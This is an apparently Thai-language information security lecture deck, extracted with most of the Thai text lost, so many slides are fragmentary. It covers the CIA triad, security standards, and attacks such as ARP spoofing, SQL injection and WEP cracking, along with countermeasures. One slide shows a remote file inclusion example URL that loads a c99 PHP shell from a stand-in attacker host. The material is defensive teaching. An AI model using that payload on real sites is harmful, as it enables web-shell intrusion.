1 ... - PowerPoint PPT Presentation

Presentation Transcript


Slide 1

1

.


Slide 2

1.

4

1.1

4


Slide 3

:

Linux / Windows Core Switch, Router Firewall


Slide 4

/ / Back Door:

(copy) () Back Door Trojan


Slide 5

/ :

Access Point Wireless LAN Layer2 Switch, Access Point


Slide 6

1.2

( ) ( Application Web Application) (DoS: Denial of Service) //


Slide 7

:

sa SQL Server Windows Server password Terminal Service


Slide 8

:

Application () Web Application remote exploit Metasploit ( Shell command) // Linux Command Windows Command ftp, tftp, scp wget Back Door


Slide 9

:

DoS (Denial of Service) exploit DoS DoS ARP, ICMP, TCP


Slide 10

- / / :

Client Windows XP / Vista Windows Server 2003 / 2008 Windows Server Windows Client Download ( Client ) DoS netcut


Slide 11

1.3

  • (Authentication) Authentication MAC Address


Slide 12

  • - MAC Address

    - ARP Spoof/Poisoning

    - Rogue DHCP

    - Wireless LAN

    - Hardening (firmware)


Slide 13

1.4

Database Server / /


Slide 14

SQL Injection Database XSS Cookie / Session ID Webmaster Webmaster Webmaster Database

Database e-commerce


Slide 15

2.

3 CIA Confidentiality, Integrity Availability

  • Confidentiality ()

  • Integrity ()

  • Availability ()


Slide 16

Integrity

Availability

Infosec

Confidentiality

(CIA)



2.1 Confidentiality ()

" ?" (Who is authorized to use data?) somsri@msu.ac.th somsak@msu.ac.th, sompong@msu.ac.th somkid@msu.ac.th


Slide 18

(Access Control) username password (Cryptography & Encryption) SSL https



2.2 Integrity ()

() " ?"(Is data good?) ( ) Somsri (file) thawatchai somsri


Slide 20

Checksum checksum MD5 Linux checksum Tripwire (Cryptography & Encryption)



2.3 Availability ()

" ?" (Can access data whenever need it?) mail.msu.ac.th (DoS Attack: Denial of Service Attack) somsri@msu.ac.th, somsak@msu.ac.th thawatchai@msu.ac.th Mail Backup


Slide 22

Load Balancing, Failover, Backup, Hardening DoS


Slide 23

2.4

  • Authentication

  • Authorization

  • Non-repudiation


Slide 24

2.4.1 Authentication

Authentication username password

- : username password

- :

- :


Slide 25

2.4.2 Authorization

Authorization (Authentication) admin / Guest


Slide 26

2.4.3 Non-repudiation

Non-repudiation ()


Slide 27

E-commerce

- / (Confidentiality)

- / (Authentication)

- / (Integrity)

- (Non-repudiation)


Slide 28

3.

(Hacker) Virus, Worm



3.1 (Threat)

- (Hacker)

- Virus, Worm

-

-



(Hacker)

(Vulnerability)

(Risk) (Tools) CERT.ORG



Virus, Worm

Virus Worm Anti Virus Worm patch Virus Worm Virus Worm


Slide 33

Remote Exploit


Slide 34

Backup DR Site (Disaster Recovery Site) (Recovery)



3.2 (Accidental)

Hardware software /


Slide 36

(Physical) UTP / STP / Coaxial Core Switch



Hardware software /

Hardware software hard disk Backup hardware software Backup


Slide 38

Low-level ( format ) Backup


Slide 39

4.

(ISO/IEC 27001)



4.1 ISO/IEC 27001

ISO/IEC 27001 ISO/IEC 27001:2005 ISMS (Information Security Management System) ISO (The International Organization for Standardization) IEC (The International Electrotechnical Commission) ISMS ISMS



ISO/IEC27001:2005

ISO/IEC27001:2005 11

1) (Security Policy)

2) (Organization of information security)

3) (Asset Management)

4) (Human Resources Security)

5) (Physical and Environmental Security)



ISO/IEC27001:2005

6) (Communications and Operations Management)

7) (Access Control)

8) (Information Systems Acquisition, Development and Maintenance)

9) (Information Security Incident Management)

10) (Business Continuity Management)

11) (Compliance)



ISO/IEC27001 PDCA (Plan-Do-Check-Act)



4.2 ISO/IEC TR 13335

Guidelines for the Management of IT Security ISO/IEC2007 technical report


Slide 45

5

1.

2.

3.

4.

5.



4.3 ISO/IEC 15408:2005/Common Criteria/ ITSEC

Communication Security Establishment Central Service of the Information Federal Office for Security in Information Technology The Netherlands National Communications Security Agency Communications-Electronics Security Group National Institute of Standards and Technology and National Security Agency



4.4 ITIL

ITIL Information Technology Infrastructure Library CCTA OGC ITIL


Slide 48

ITIL IT Service IT Service ITIL 8

1) (Software and Asset Management)

2) (Service Delivery)

3) (Service Support)

4) (Planning to Implement Service Management)

5) (ICT Infrastructure Management)

6) (Application Management)

7) (Security Management)

8) (Business Perspective, Volume II)



4.5 FIPS PUB 200

FIPS PUB 200 The Federal Information Processing Standards Publication 200


Slide 50

FIPS PUB 200 FIPS

1)

2)

3)

4)



4.6 NIST 800-14

NIST 800-14 National Institute of Standards and Technology 800-14 Generally Accepted Principles and Practices for Securing Information Technology Systems NIST 800-14 Computer Security 8


Slide 52

1)

2)

3)

4)

5)

6)

7)

8)



4.7 IT BPM

IT BPM Information Technology Baseline Protection Manual BSI IT BPM


Slide 54

1)

2)

3)

4)

5)



4.8 COBIT

COBIT (Control Objectives for Information and related Technology) ISACA "" (IT Governance) COBIT COBIT "" "" COBIT "" ""



4.9 COSO

COSO The Committee of Sponsoring Organizations of the Treadway Commission COSO


Slide 57

5.

  • /

  • MITM

  • DoS

  • Web Application

  • LAN Wireless LAN


Slide 58

/

Sniffer, Ethereal Wireshark Switch ARP Spoof Gateway Gateway Cookie/Session ID


Slide 60

MITM

ARP Spoof Gateway Gateway MITM (Man In The Middle) Certificate https MITM https


Slide 61

DoS

DoS Denial of Service packet ( )



Web Application

Web Application ( 80)

1) SQL Injection

2) Session Hijacking

3) XSS: Cross Site Scripting

4) Remote File Inclusion



SQL Injection

SQL SQL Injection Option, Drop down List Cookie Database



Session Hijacking

Session Session Hijacking Session TCP ( Kevin Mitnick TCP Session 1995) Session Hijacking Session Web Application HTTPS Session



XSS: Cross Site Scripting

Script Java Script Script Script Script Script Cookie Cookie Session ID Session ID



Remote File Inclusion

.php .asp Header Library

http://www.victim.com/show.php?page=main.html

http://www.victim.com/show.php?page=http://hacker.com/c99.php

php shell Linux / Windows Command



LAN Wireless LAN

LAN MAC Address MAC Address NAC: Network Access Control MAC Address Active MAC Address MAC Address Changer


Slide 68

Wireless LAN Authentication Network Access Control MAC Address Wireless LAN MAC Address MAC Address Access Point MAC Address Active Wireless LAN


Slide 69

Wireless LAN WEP WEP WEP BackTrack (http://www.remote-exploit.org) Wireless LAN Wireless LAN WPA WEP cowpatty BackTrack WPA


Slide 70

  • Remote Exploit: Metasploit IP Address Shell Command root Administrator


Slide 71

  • Remote Crack: Remote Crack Dictionary Attack Brute Force Attack generate 1


Slide 72

6.


Slide 73

6.1

(Vulnerability)

(Vulnerability) Web Application Worm


Slide 74

(Threat)

(Threat) ( )


Slide 75

(Criticality)

(Criticality) (System and data criticality) (Vulnerable criticality)

- (System and data criticality) ()

- (Vulnerable criticality)


Slide 76

(Risk)

(Risk) Database


Slide 77

(Risk) (Vulnerability) (Threat) (Criticality)


Slide 78

6.2

10

1 ()

2 Black Box White Box

3

4


Slide 79

5 Downtime ( Downtime )

6

7

8

9

10


Slide 80

6.3

6.3.1

10 2-3 0


Slide 81

:

() Service Pack Anti Virus Firewall IDS/IPS permission ( telnet ftp)


Slide 82

LAN:

MITM Switch MAC Filter IP Filter Static ARP Authen username password Rogue DHCP IP Address MAC Address , Anti Virus Personal Firewall Client


Slide 83

Wireless LAN:

WPA username password Access Point Rogue AP MAC Address


Slide 84

Web Application:

SQL Injection, XSS (Cross Site Scripting), Remote File Inclusion, Session Hijacking, file permission Directory Browsing , IIS/Apache/PHP https


Slide 85

:

Firewall Policy DR Site (Disaster Recovery Site)


Slide 86

6.3.2

DMZ IDS /IDS

Internal Network


Slide 87

() DMZ (Demilitarized Zone)


Slide 88

( Web Application 80 ) IDS: Intrusion Detection System IDS IPS IPS Intrusion Prevention System (IPS IDPS: Intrusion Detection and Prevention System)

Firewall IDS/IPS office Data Center


Slide 89

6.3.3

Anti Virus (Social Engineering) (Phishing)


Slide 90

SQL Injection, XSS: Cross Site Scripting Remote File Inclusion

Tools


Slide 91

6.3.4

3


Slide 92

7.

https

